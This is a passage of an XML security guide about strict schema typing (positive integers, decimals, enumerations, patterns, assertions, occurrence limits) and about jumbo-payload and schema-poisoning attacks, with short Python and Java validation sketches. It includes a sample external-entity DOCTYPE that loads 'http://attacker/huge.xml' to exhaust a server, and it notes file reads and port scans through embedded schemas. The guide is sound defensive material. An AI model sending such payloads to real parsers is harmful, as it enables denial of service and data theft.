When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the 16 hexadecimal characters. To exemplify this scenario, when using XML encryption, some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered it valid. The first portion of this data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema.&lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. To avoid that logical vulnerability, the schema should use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
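&lt;br /&gt;
Where schema validation is not available, a similar restriction could be approximated in application code. The Python sketch below is only an illustration of that idea; &amp;lt;tt&amp;gt;parse_positive_integer&amp;lt;/tt&amp;gt; is a hypothetical helper, not part of any library, and it accepts an optional plus sign followed by digits, which is the assumed lexical form of &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt;.&lt;br /&gt;

```python
import re

# Assumed lexical form of xs:positiveInteger: optional plus sign, then digits.
_POSITIVE_INTEGER = re.compile(r"\+?[0-9]+")


def parse_positive_integer(text):
    """Parse text as an integer greater than zero, or raise ValueError."""
    if _POSITIVE_INTEGER.fullmatch(text) is None:
        raise ValueError("not a positive integer: %r" % text)
    value = int(text)
    if value == 0:
        raise ValueError("zero is not a positive integer")
    return value
```

A quantity parsed this way can never make &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt; negative or zero as long as the price itself is positive.&lt;br /&gt;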
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If a data type that allows zero is used instead, a denominator of zero may trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
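With this schema, a price of Infinity or NaN will not trigger any errors in the application, because these values are not valid for the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type and the document is rejected during validation. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;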
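&lt;br /&gt;
The same idea can be illustrated outside of a schema. The following Python sketch accepts a price only when it has a plain decimal form (optional sign, digits, optional fraction), so &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;, and exponent notation are refused. The helper name &amp;lt;tt&amp;gt;parse_price&amp;lt;/tt&amp;gt; is hypothetical, and the regular expression is an assumption about what the application wants to accept.&lt;br /&gt;

```python
import re
from decimal import Decimal

# Optional sign, then digits with an optional fraction, or a bare fraction.
_DECIMAL = re.compile(r"[+-]?([0-9]+(\.[0-9]*)?|\.[0-9]+)")


def parse_price(text):
    """Return text as a Decimal, refusing NaN, Infinity, and exponent forms."""
    if _DECIMAL.fullmatch(text) is None:
        raise ValueError("not a plain decimal number: %r" % text)
    return Decimal(text)
```

Parsing into &amp;lt;tt&amp;gt;Decimal&amp;lt;/tt&amp;gt; rather than a binary floating point type also avoids rounding surprises when prices are multiplied by quantities.&lt;br /&gt;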
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
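&lt;br /&gt;
An application that cannot rely on the schema could mirror the enumeration with a fixed set of allowed values. The Python sketch below assumes exact, case-sensitive matching, as the enumeration does; the names &amp;lt;tt&amp;gt;VALID_MONTHS&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;is_valid_month&amp;lt;/tt&amp;gt; are hypothetical.&lt;br /&gt;

```python
# The same twelve values listed in the enumeration.
VALID_MONTHS = frozenset([
    "January", "February", "March", "April", "May", "June",
    "July", "August", "September", "October", "November", "December",
])


def is_valid_month(value):
    """Return True only for one of the twelve whitelisted month names."""
    return value in VALID_MONTHS
```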
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a specific length (let's say 8), the length can be specified as follows:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values from &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; to &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for an SSN.&lt;br /&gt;
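&lt;br /&gt;
The same pattern can be checked in application code. The Python sketch below reuses the regular expression from the schema; &amp;lt;tt&amp;gt;is_valid_ssn&amp;lt;/tt&amp;gt; is a hypothetical helper name. It uses &amp;lt;tt&amp;gt;fullmatch&amp;lt;/tt&amp;gt; so that the whole string has to match, which is how a schema pattern is applied.&lt;br /&gt;

```python
import re

# Same expression as the pattern facet; fullmatch anchors it at both ends.
SSN_PATTERN = re.compile(r"[0-9]{3}-[0-9]{2}-[0-9]{4}")


def is_valid_ssn(value):
    """Return True only if the whole string matches the SSN pattern."""
    return SSN_PATTERN.fullmatch(value) is not None
```

Using a search or a prefix match instead would accept values that merely contain a valid SSN, such as a valid number followed by extra characters.&lt;br /&gt;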
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components, introduced in XML Schema 1.1, constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
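&lt;br /&gt;
For processors that do not support assertions, an equivalent check could be made before the division takes place. The Python sketch below is an assumption about how that might look; &amp;lt;tt&amp;gt;parse_denominator&amp;lt;/tt&amp;gt; is a hypothetical helper that accepts any integer except zero.&lt;br /&gt;

```python
import re

# Optional sign followed by digits, the assumed lexical form of xs:integer.
_INTEGER = re.compile(r"[+-]?[0-9]+")


def parse_denominator(text):
    """Parse text as a nonzero integer, mirroring the test $value != 0."""
    if _INTEGER.fullmatch(text) is None:
        raise ValueError("not an integer: %r" % text)
    value = int(text)
    if value == 0:
        raise ValueError("denominator must not be zero")
    return value
```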
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Leaving the maximum number of occurrences undefined can be costly, because the application may receive an extreme number of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications that allow limitless occurrences should test what happens when they receive an extremely large number of elements to process. Since computational resources are limited, the consequences should be analyzed, and a maximum number should eventually be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
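&lt;br /&gt;
When the schema cannot be changed, a limit can also be enforced while parsing. The following Java sketch assumes a SAX-based application; the class name &amp;lt;tt&amp;gt;BuyLimitHandler&amp;lt;/tt&amp;gt; and the limit passed to it are hypothetical and would have to be chosen for the application at hand:&lt;br /&gt;
&lt;br /&gt;
```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.Attributes;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

// Hypothetical guard: aborts parsing once too many "buy" elements have been seen.
class BuyLimitHandler extends DefaultHandler {
  private final int maxBuys; // illustrative limit chosen by the application
  private int seen = 0;

  BuyLimitHandler(int maxBuys) {
    this.maxBuys = maxBuys;
  }

  @Override
  public void startElement(String uri, String localName, String qName, Attributes atts)
      throws SAXException {
    if (qName.equals("buy")) {
      seen++;
      if (seen > maxBuys) {
        throw new SAXException("too many buy elements, the limit is " + maxBuys);
      }
    }
  }

  // Returns true when the document parses within the limit, and false when
  // parsing was aborted (limit exceeded, or the input was not well formed).
  static boolean withinLimit(String xml, int maxBuys) {
    try {
      SAXParserFactory.newInstance().newSAXParser().parse(
          new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)),
          new BuyLimitHandler(maxBuys));
      return true;
    } catch (SAXException e) {
      return false;
    } catch (IOException | ParserConfigurationException e) {
      throw new IllegalStateException(e);
    }
  }
}
```
&lt;br /&gt;
Where the schema is under the application's control, replacing &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; with a concrete &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; value is probably the simpler option, since a validating parser can then reject oversized documents on its own.&lt;br /&gt;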
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
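&lt;br /&gt;
A common precaution against documents of this kind is to cap the number of bytes handed to the parser. The following Java sketch shows one way to do this; the class &amp;lt;tt&amp;gt;BoundedInputStream&amp;lt;/tt&amp;gt; and its limit are assumptions made for illustration, and the wrapper would sit between the network stream and the XML parser:&lt;br /&gt;
&lt;br /&gt;
```java
import java.io.ByteArrayInputStream;
import java.io.FilterInputStream;
import java.io.IOException;
import java.io.InputStream;

// Hypothetical wrapper: fails once more than maxBytes have been read.
// Bytes passed over with skip() are not counted in this sketch.
class BoundedInputStream extends FilterInputStream {
  private final long maxBytes;
  private long count = 0;

  BoundedInputStream(InputStream in, long maxBytes) {
    super(in);
    this.maxBytes = maxBytes;
  }

  @Override
  public int read() throws IOException {
    int b = super.read();
    if (b != -1) {
      account(1);
    }
    return b;
  }

  @Override
  public int read(byte[] buf, int off, int len) throws IOException {
    int n = super.read(buf, off, len);
    if (n > 0) {
      account(n);
    }
    return n;
  }

  private void account(long n) throws IOException {
    count += n;
    if (count > maxBytes) {
      throw new IOException("document exceeds " + maxBytes + " bytes");
    }
  }

  // Drains the data through the wrapper; returns false if the limit was hit.
  static boolean fits(byte[] data, long maxBytes) {
    byte[] buf = new byte[4096];
    try (InputStream in = new BoundedInputStream(new ByteArrayInputStream(data), maxBytes)) {
      while (in.read(buf) != -1) {
        // discarded here; an application would pass the stream to its parser
      }
      return true;
    } catch (IOException e) {
      return false;
    }
  }
}
```
&lt;br /&gt;
A byte limit only addresses the size of the document as transmitted; it does not limit what the document expands to once entities are resolved.&lt;br /&gt;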
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available on the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server processes external entities, the attacker could use the schema, for example, to read files from the server. This type of schema only serves as a suggestion for sending a document; to be used safely, it must include a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
